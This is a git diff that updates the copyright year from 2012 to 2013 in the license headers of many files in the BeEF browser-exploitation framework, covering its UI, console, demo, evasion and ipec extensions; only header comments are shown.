diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
index ed30b2e8d..cadd37d15 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
index c9c549e4f..882aea26b 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index 1af9cf2c9..d499d9a78 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ux/PagingStore.js b/extensions/admin_ui/media/javascript/ux/PagingStore.js
index 0536b4131..8406df749 100644
--- a/extensions/admin_ui/media/javascript/ux/PagingStore.js
+++ b/extensions/admin_ui/media/javascript/ux/PagingStore.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ux/StatusBar.js b/extensions/admin_ui/media/javascript/ux/StatusBar.js
index 9b70abe46..96861c4d3 100644
--- a/extensions/admin_ui/media/javascript/ux/StatusBar.js
+++ b/extensions/admin_ui/media/javascript/ux/StatusBar.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js
index a9bfde238..16052f8b5 100644
--- a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js
+++ b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
index 4ca740001..3818da8b1 100644
--- a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
+++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/autoloader/config.yaml b/extensions/autoloader/config.yaml
index 419798363..8f5e1bbef 100644
--- a/extensions/autoloader/config.yaml
+++ b/extensions/autoloader/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/autoloader/extension.rb b/extensions/autoloader/extension.rb
index b63fbf399..19cf52fc4 100644
--- a/extensions/autoloader/extension.rb
+++ b/extensions/autoloader/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/autoloader/model.rb b/extensions/autoloader/model.rb
index c83c441b5..caf1099ec 100644
--- a/extensions/autoloader/model.rb
+++ b/extensions/autoloader/model.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/config.yaml b/extensions/console/config.yaml
index baa7e4865..6c9a7c879 100644
--- a/extensions/console/config.yaml
+++ b/extensions/console/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/extension.rb b/extensions/console/extension.rb
index cd3253a8a..98014aab8 100644
--- a/extensions/console/extension.rb
+++ b/extensions/console/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/lib/command_dispatcher.rb b/extensions/console/lib/command_dispatcher.rb
index d74602bb7..4d75fed9e 100644
--- a/extensions/console/lib/command_dispatcher.rb
+++ b/extensions/console/lib/command_dispatcher.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/lib/command_dispatcher/command.rb b/extensions/console/lib/command_dispatcher/command.rb
index e3fb00db6..d891b3ad4 100644
--- a/extensions/console/lib/command_dispatcher/command.rb
+++ b/extensions/console/lib/command_dispatcher/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb
index 59ac7c82a..e36ff4930 100644
--- a/extensions/console/lib/command_dispatcher/core.rb
+++ b/extensions/console/lib/command_dispatcher/core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/lib/command_dispatcher/target.rb b/extensions/console/lib/command_dispatcher/target.rb
index 0eaf4deeb..5c06e94d2 100644
--- a/extensions/console/lib/command_dispatcher/target.rb
+++ b/extensions/console/lib/command_dispatcher/target.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index 98b60941c..a13e74013 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/console/shell.rb b/extensions/console/shell.rb
index 84d523ebb..36a2edbde 100644
--- a/extensions/console/shell.rb
+++ b/extensions/console/shell.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/customhook/api.rb b/extensions/customhook/api.rb
index d3fe850b6..43314aa2a 100644
--- a/extensions/customhook/api.rb
+++ b/extensions/customhook/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/customhook/config.yaml b/extensions/customhook/config.yaml
index fe677fc14..1464abb3d 100644
--- a/extensions/customhook/config.yaml
+++ b/extensions/customhook/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/customhook/extension.rb b/extensions/customhook/extension.rb
index 644c3be36..fca75286b 100644
--- a/extensions/customhook/extension.rb
+++ b/extensions/customhook/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/customhook/handler.rb b/extensions/customhook/handler.rb
index 621333741..4dcd62f38 100644
--- a/extensions/customhook/handler.rb
+++ b/extensions/customhook/handler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/customhook/html/index.html b/extensions/customhook/html/index.html
index 0c4aee29b..c6b462a9a 100644
--- a/extensions/customhook/html/index.html
+++ b/extensions/customhook/html/index.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/api.rb b/extensions/demos/api.rb
index 543876bd9..b96b213eb 100644
--- a/extensions/demos/api.rb
+++ b/extensions/demos/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/demos/chrome_extension/index.html b/extensions/demos/chrome_extension/index.html
index 702914d70..b264022d4 100644
--- a/extensions/demos/chrome_extension/index.html
+++ b/extensions/demos/chrome_extension/index.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/chrome_extension/persistent_tab.html b/extensions/demos/chrome_extension/persistent_tab.html
index 65a992234..ca5b3c38a 100644
--- a/extensions/demos/chrome_extension/persistent_tab.html
+++ b/extensions/demos/chrome_extension/persistent_tab.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/config.yaml b/extensions/demos/config.yaml
index d74ae8563..8a37ca1d0 100644
--- a/extensions/demos/config.yaml
+++ b/extensions/demos/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/demos/extension.rb b/extensions/demos/extension.rb
index c6684cf37..b3f3a4b34 100644
--- a/extensions/demos/extension.rb
+++ b/extensions/demos/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js
index 808322d68..aa364ae45 100644
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/demos/html/basic.html b/extensions/demos/html/basic.html
index c1920bed3..58e3e103d 100644
--- a/extensions/demos/html/basic.html
+++ b/extensions/demos/html/basic.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/butcher/butch.css b/extensions/demos/html/butcher/butch.css
index efb2f7610..90ddbf5a9 100644
--- a/extensions/demos/html/butcher/butch.css
+++ b/extensions/demos/html/butcher/butch.css
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/demos/html/butcher/index.html b/extensions/demos/html/butcher/index.html
index 5c7b8264b..48b1f51e7 100644
--- a/extensions/demos/html/butcher/index.html
+++ b/extensions/demos/html/butcher/index.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/butcher/jquery-1.5.min.js b/extensions/demos/html/butcher/jquery-1.5.min.js
index 86b5f7755..475f72cae 100644
--- a/extensions/demos/html/butcher/jquery-1.5.min.js
+++ b/extensions/demos/html/butcher/jquery-1.5.min.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/demos/html/butcher/secret_page.html b/extensions/demos/html/butcher/secret_page.html
index 328d1d06f..8191a8da7 100644
--- a/extensions/demos/html/butcher/secret_page.html
+++ b/extensions/demos/html/butcher/secret_page.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/checkJava.java b/extensions/demos/html/checkJava.java
index a936e5733..83124043d 100755
--- a/extensions/demos/html/checkJava.java
+++ b/extensions/demos/html/checkJava.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/demos/html/clickjacking/clickjack_attack.html b/extensions/demos/html/clickjacking/clickjack_attack.html
index a526b7c6c..99a5551e3 100644
--- a/extensions/demos/html/clickjacking/clickjack_attack.html
+++ b/extensions/demos/html/clickjacking/clickjack_attack.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/clickjacking/clickjack_victim.html b/extensions/demos/html/clickjacking/clickjack_victim.html
index 5024b0f15..3a9aa815a 100644
--- a/extensions/demos/html/clickjacking/clickjack_victim.html
+++ b/extensions/demos/html/clickjacking/clickjack_victim.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/plain.html b/extensions/demos/html/plain.html
index 1a37a3820..c792bb341 100644
--- a/extensions/demos/html/plain.html
+++ b/extensions/demos/html/plain.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/report.html b/extensions/demos/html/report.html
index e16c2bc2f..9ec878a64 100755
--- a/extensions/demos/html/report.html
+++ b/extensions/demos/html/report.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/demos/html/secret_page.html b/extensions/demos/html/secret_page.html
index b879813d0..ffae2c2e5 100644
--- a/extensions/demos/html/secret_page.html
+++ b/extensions/demos/html/secret_page.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml
index e6f4d4eab..95536e9f4 100644
--- a/extensions/evasion/config.yaml
+++ b/extensions/evasion/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/evasion.rb b/extensions/evasion/evasion.rb
index 360bbd72c..e9d929988 100644
--- a/extensions/evasion/evasion.rb
+++ b/extensions/evasion/evasion.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb
index f7b7a045b..aade68d1a 100644
--- a/extensions/evasion/extension.rb
+++ b/extensions/evasion/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/helper.rb b/extensions/evasion/helper.rb
index 4de2b7ea6..f8e3b22df 100644
--- a/extensions/evasion/helper.rb
+++ b/extensions/evasion/helper.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/obfuscation/base_64.rb b/extensions/evasion/obfuscation/base_64.rb
index 6033fd86d..712c9ee99 100644
--- a/extensions/evasion/obfuscation/base_64.rb
+++ b/extensions/evasion/obfuscation/base_64.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/obfuscation/minify.rb b/extensions/evasion/obfuscation/minify.rb
index f70dc835b..054f60efc 100644
--- a/extensions/evasion/obfuscation/minify.rb
+++ b/extensions/evasion/obfuscation/minify.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/obfuscation/scramble.rb b/extensions/evasion/obfuscation/scramble.rb
index 4671a8359..0a85d5dd5 100644
--- a/extensions/evasion/obfuscation/scramble.rb
+++ b/extensions/evasion/obfuscation/scramble.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb
index 8c6d8cc10..8535932d9 100644
--- a/extensions/evasion/obfuscation/whitespace.rb
+++ b/extensions/evasion/obfuscation/whitespace.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/events/api.rb b/extensions/events/api.rb
index 151c24f08..bf991f81d 100644
--- a/extensions/events/api.rb
+++ b/extensions/events/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/events/config.yaml b/extensions/events/config.yaml
index 5806d81d5..00c671f80 100644
--- a/extensions/events/config.yaml
+++ b/extensions/events/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/events/extension.rb b/extensions/events/extension.rb
index b54117abe..6e01946ed 100644
--- a/extensions/events/extension.rb
+++ b/extensions/events/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/events/handler.rb b/extensions/events/handler.rb
index 451f38fcc..17fd2f201 100644
--- a/extensions/events/handler.rb
+++ b/extensions/events/handler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
index 44b3d38b9..1f960d139 100644
--- a/extensions/ipec/config.yaml
+++ b/extensions/ipec/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
index d1d1d1d53..4cf163a4b 100644
--- a/extensions/ipec/extension.rb
+++ b/extensions/ipec/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
index 144bca0a5..142cac9ad 100644
--- a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
index 8bb7b4361..173aa023d 100644
--- a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
+++ b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
index fb903aa6a..277781a0f 100644
--- a/extensions/ipec/files/LinkTargetFinder/skin/skin.css
+++ b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/ipec/junk_calculator.rb b/extensions/ipec/junk_calculator.rb
index 9db80ecd5..9532c7e32 100644
--- a/extensions/ipec/junk_calculator.rb
+++ b/extensions/ipec/junk_calculator.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/ipec/models/ipec_exploits.rb b/extensions/ipec/models/ipec_exploits.rb
index e219e7b11..7def2a862 100644
--- a/extensions/ipec/models/ipec_exploits.rb
+++ b/extensions/ipec/models/ipec_exploits.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
